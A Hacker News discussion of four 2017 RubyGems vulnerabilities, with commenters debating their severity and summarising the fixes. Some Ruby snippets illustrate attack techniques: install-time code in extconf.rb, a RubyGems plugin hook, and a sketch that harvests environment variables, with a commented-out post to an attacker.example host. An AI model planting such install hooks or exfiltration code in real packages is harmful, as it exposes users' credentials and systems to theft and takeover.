Multiple vulnerabilities in RubyGems (ruby-lang.org)
189 points by omarish on Aug 29, 2017 | 36 comments

>> "a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files"

Yeeks. Not good.

(sudo) gem update --system ASAP

I don't really get the fuss about this one. It's annoying and a vector, true, but keep in mind that even with this fixed, a malicious gem can overwrite arbitrary files. A gem can bring with it a C-extension. This extension is compiled with a makefile created by the gem-provided extconf.rb. AFAIK, the code in the extconf.rb is executed at gem install time, so arbitrary code can be executed at gem install time.
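To make this concrete, here's a minimal sketch of such an extconf.rb (the payload is a harmless stand-in; any Ruby in this file runs at install time, with whatever privileges the installing user has):

```ruby
# extconf.rb -- sketch: everything here executes at `gem install` time,
# before any compilation happens.
require 'mkmf'
require 'tmpdir'

Dir.chdir(Dir.tmpdir) do
  # Harmless stand-in for an arbitrary payload: drop a marker file.
  File.write('extconf-demo.txt', "ran at install time as uid #{Process.uid}")

  # extconf.rb must still emit a Makefile or the install aborts;
  # mkmf's create_makefile takes care of that.
  create_makefile('demo/demo')
end
```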

AFAICS this is the relevant line: https://github.com/rubygems/rubygems/blob/master/lib/rubygem...

Edit: Or, if you want to get a little more creative, have your gem include a plugin to rubygems itself, similar to what https://github.com/rvm/executable-hooks does.
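The plugin mechanism is just a naming convention: RubyGems requires any file named rubygems_plugin.rb from installed gems' load paths on every `gem` invocation. A sketch of what a gem could ship (the hook body is a harmless stand-in):

```ruby
# rubygems_plugin.rb -- sketch: shipping a file with this name in a gem
# gets you code execution on every subsequent `gem` command, not just at
# install time.
require 'rubygems'

Gem.post_install do |installer|
  # Runs after *any* gem install from now on, not only this gem's.
  warn "plugin saw install of #{installer.spec.full_name}"
end
```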

I agree. Or how about one step away from just the installation? Once you load a gem it can do whatever the hell it wants to your system. This vulnerability feels very security-theater-ish. At the end of the day, someone needs to audit the gem or have deep trust in the supplying party (i.e. Rails) to protect against arbitrary file manipulation.

Installation and running are not necessarily done with the same account. Often, apps run with lower privileges than they're installed with, so the damage may be somewhat mitigated. I'd really treat that as a separate, albeit related problem.

While this is bad, most gems are executable code, which will get executed (seeing as you installed the gem).

So while this is bad, I don't think it's that bad -- a malicious gem could always mess you up. Still update!

The only difference is that you are perhaps more likely to install a gem system-wide (which normally requires root rights) than to run code from a locally installed gem with root rights.

I don't quite understand how this is different from the status quo? I guess gems may (sometimes) be installed with a different user (or even root) than the application server?

But even if: most systems today probably only run that one service, and the application server can rwx pretty much everything of interest because that's its job, right?

10 years or so ago you'd often see some company's server running apache as well as a mail server, the internal document repository and the financial systems. In that sort of setup, it's important to (try to) keep these systems isolated from each other. But today, all that root access would give you is the ability to read a few more Ubuntu man pages.

I wouldn't be so optimistic. There are often credentials to other systems (like databases, etc) on such servers, plus they now have access to the private network(s) the compromised server resides on. It gives the attacker the opportunity to serve exploits to users, to forward incoming requests from users to external servers (maybe there's an auth token or something they can use), and tons of other stuff.

Yep. Even if you only owned a perfectly sterile (no secrets) proxy tier to a distinct service tier, you are placed in the path of requests from clients to those services and can thereby extract credentials (passwords, tokens) or PII (names, emails), which would still be unacceptable.

> and the application server can rwx pretty much everything of interest because that's its job, right?

Eh, I don't know about that. I don't think most application servers are running as root, and I'm pretty sure it's considered bad practice to run them as root, no?

But yeah, they still need to have enough privs to do their jobs, which will be a lot of privs. But you still don't go from that to "might as well just run as root then".

Developer machines could be as interesting as servers, maybe more. If they can install a keylogger using a malicious or hijacked gem, then bingo!

The file overwrite and the ANSI sequence vulnerabilities are extra attack vectors. The main one has always been the code itself and its vetting process. This goes for Ruby gems and for any other open- or closed-source piece of code we run on our machines, starting from the processor(s) microcode.

Would you have to go out of your way to find a malicious gem, though? It's not like any of the popular gems would try to overwrite files, right?

There was recently a fiasco with NPM over a malicious node package whose name was an intentional typo of a popular package, and upon installation it exfiltrated all environment variables: https://twitter.com/o_cee/status/892306836199800836
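The Ruby analogue takes about two lines: install-time code sees the full process environment, which on developer and CI machines routinely includes tokens and keys. A harmless sketch of the collection step (the exfiltration call is commented out and the URL is made up):

```ruby
# Sketch: serialize everything visible in ENV, as the malicious npm
# package did on install.
require 'json'

payload = JSON.generate(ENV.to_h)
# Net::HTTP.post(URI('https://attacker.example/collect'), payload)  # the exfil step

puts "#{ENV.size} environment variables captured (#{payload.bytesize} bytes)"
```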

After this got uncovered, Duo published a blog post where they scanned for and found several other malicious packages:


The last one they talk about is a worm: it propagates by adding itself to any packages authored on the computer it's installed on.

These issues are not unique to npm.

Why go out of your way when you can just buy a popular one? This was a fairly mild version of that: https://forum.sublimetext.com/t/rfc-default-package-control-...

Granted, that was just data collection, but the outcome could be far worse given a combination of popular-but-bad code and a little bit of money.

Well, an existing gem might not. But the developer of a gem you use could have their computer compromised, and a malicious update could be published from it. If you inadvertently download that update while updating your gems, you're compromised too.

The problem here is that you don't even have to get directly attacked to be affected.

Well it's a web of trust: typically people only trust their Gemfile, not their entire Gemfile.lock. If you audit the latter you should be fine (though of course you should upgrade regardless).

How much do you trust the code review process on every ruby gem?

I have a mirror of all Rubygems from last month. Should I scan em for PoCs?

Go for it, and report back!

If you can even figure out how to do such a scan, let us know!

What does PoC mean?

Proof of Concept (of an exploit), e.g., is it "in the wild" and being exploited.


Is the work on adding TUF to RubyGems still happening? I can only find this stagnant PR: https://github.com/rubygems/rubygems/pull/719

No work is happening in this direction on any known library server. They are waiting for (another) major hack to wake them up.

Is there a more detailed description of the vulnerabilities somewhere?

The last 2 commits you listed are actually both for the arbitrary file write issue, and there was a 5th commit for the ANSI issue:


I went through all 4 issues and did a brief writeup for each of them. Only the first 2 issues are serious (and worth upgrading for). The last 2 issues are not really a big deal at all.

1) "a DNS request hijacking vulnerability"

Rubygems supports a gem server discovery mechanism: if you set your gem source to 'https://example.com', the gem client will do an SRV DNS lookup on "_rubygems._tcp.example.com" to determine where it should send requests.

A MITM can intercept that DNS request and return whatever server they want, forcing the gem client to download code from a malicious server.

Fixed by:


Now the returned DNS record must be for a subdomain of the gem source (in this case it must point to a subdomain of "example.com").
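The idea behind the constraint can be sketched like this (allowed_target? is a made-up helper, not the actual rubygems code):

```ruby
# The SRV answer is honored only if its target is the configured source
# host itself or a subdomain of it.
def allowed_target?(source_host, srv_target)
  srv_target == source_host || srv_target.end_with?(".#{source_host}")
end

allowed_target?("example.com", "api.example.com")  # => true
allowed_target?("example.com", "evil.test")        # => false
```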

2) "a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files"

Gem contents could be unpacked in arbitrary file locations by setting the gem name to include file traversal characters like "../".
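A sketch of why that's exploitable (paths are illustrative): joining a traversal-laden name under the install root yields a destination outside that root.

```ruby
require 'pathname'

root = Pathname.new('/var/lib/gems/2.4.0/gems')
dest = (root + '../../../../../etc/cron.d/evil-1.0').cleanpath

dest.to_s                         # => "/etc/cron.d/evil-1.0"
dest.to_s.start_with?(root.to_s)  # => false: escaped the install root
```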

Fixed by:



Now gem names can only contain letters, numbers, underscore (_), dash (-), and dot (.).
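The idea behind the check can be sketched as follows (this is illustrative, not the exact rubygems regexp):

```ruby
# Whitelist the allowed characters; anything else, including the "/"
# needed for a "../" traversal, is rejected.
VALID_NAME = /\A[A-Za-z0-9_.\-]+\z/

def safe_gem_name?(name)
  !!VALID_NAME.match(name)
end

safe_gem_name?('rack')               # => true
safe_gem_name?('../../etc/passwd')   # => false ("/" is not allowed)
```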

3) "an ANSI escape sequence vulnerability"

Text specified in a gemspec can be output on installation or displayed when showing information about the gem. Gem authors can inject terminal escape sequences into (for instance) the authors field of the gem, and this will mess with end users' terminals.

Fixed by:


Now ANSI control characters are scrubbed out of text fields.
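The kind of scrubbing involved can be sketched like this (the character class is illustrative, not the exact rubygems implementation):

```ruby
# Strip control characters, including ESC (0x1b), which starts ANSI
# sequences, before echoing attacker-controlled gemspec fields.
def scrub(text)
  text.gsub(/[\x00-\x08\x0b-\x1f\x7f]/, '')
end

scrub("Mallory\e[2JInnocent Author")  # => "Mallory[2JInnocent Author"
```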

4) "a DoS vulnerability in the query command"

If someone provided an extremely large gem summary, rubygems would hang trying to process it.

Fixed by:


Now the summary is truncated to 100,000 characters. I'm a little surprised this was even triaged as a vulnerability.
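A sketch of the mitigation (the limit is the 100,000 characters mentioned above):

```ruby
SUMMARY_LIMIT = 100_000

def truncated_summary(summary)
  summary.length > SUMMARY_LIMIT ? summary[0, SUMMARY_LIMIT] : summary
end

truncated_summary('x' * 200_000).length  # => 100000
truncated_summary('short')               # => "short"
```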

I'm sure this has been brought up before, but I think HN should have a special tab where submissions like this get pinned -- important stories where people need to take action, like security holes or political events (e.g. net neutrality).

That doesn't make any sense to me.

People in such responsible positions are on respective announcement mailing lists anyway, and read about those events (and patch their system and/or take other measures) long before the story is upvoted on HN.

For example, every administrator of Debian systems is expected to be subscribed to the "debian-security-announce" mailing list.

Also, everyone who is interested or active in German net politics is subscribed to the "netzpolitik.org" RSS feed, or visits that site regularly.

Waiting until such a story hits HN and relying on that seems highly dubious to me. As soon as any important story hits social media (such as Twitter, Reddit or HN), all important measures have already been finished. HN is really the end stage here, not the beginning. It is the reaction, not the initiative.

In short: Use the real network and connect directly to the relevant groups. Don't rely on aggregation networks.

(BTW, isn't it almost comical that the latter, rather than the former, are called "social" networks?)

I am not sure it has actually been announced on the relevant mailing list - https://groups.google.com/forum/#!forum/ruby-security-ann

You're right in theory, but I've seen numerous people in important positions on FOSS and closed-source projects actually start addressing a problem only after it has "gone viral" on HN.

Don't overestimate people; most devs and managers would look the other way if not much internet attention is given to their security issue. If they notice a report on HN, they kind of panic and go into damage-control mode, and then maybe actually fix the issue itself as well.

Being vocal on a popular and respected forum such as HN is important for serious issues to get much-needed attention.

Please note: I don't like that this is the truth but alas, I guess this is how Homo Sapiens works: it's not important if you know you screwed up; you can bullsh*t yourself to oblivion and delude your conscience but once many people know about your screw-up, then you suddenly care.

I think this is a great idea. Threads should stay on the main page, but also be pinned on a new tab, maybe called "Breaches", or something.

Given the hands-off approach, the PR concerns, and the fact that they have a healthy community of tech-minded people on here from which to recruit, I find it unlikely that they would do anything perceived as too alienating to anyone.

There have been tons of suggestions for site improvements (much smaller ones, mind you) that have never gained any attention.

Such vulnerabilities would usually only impact a portion of users, and I hope the affected people have more reliable ways to keep up to date with vulnerabilities than HN...

Ruby, the gift that keeps on giving.
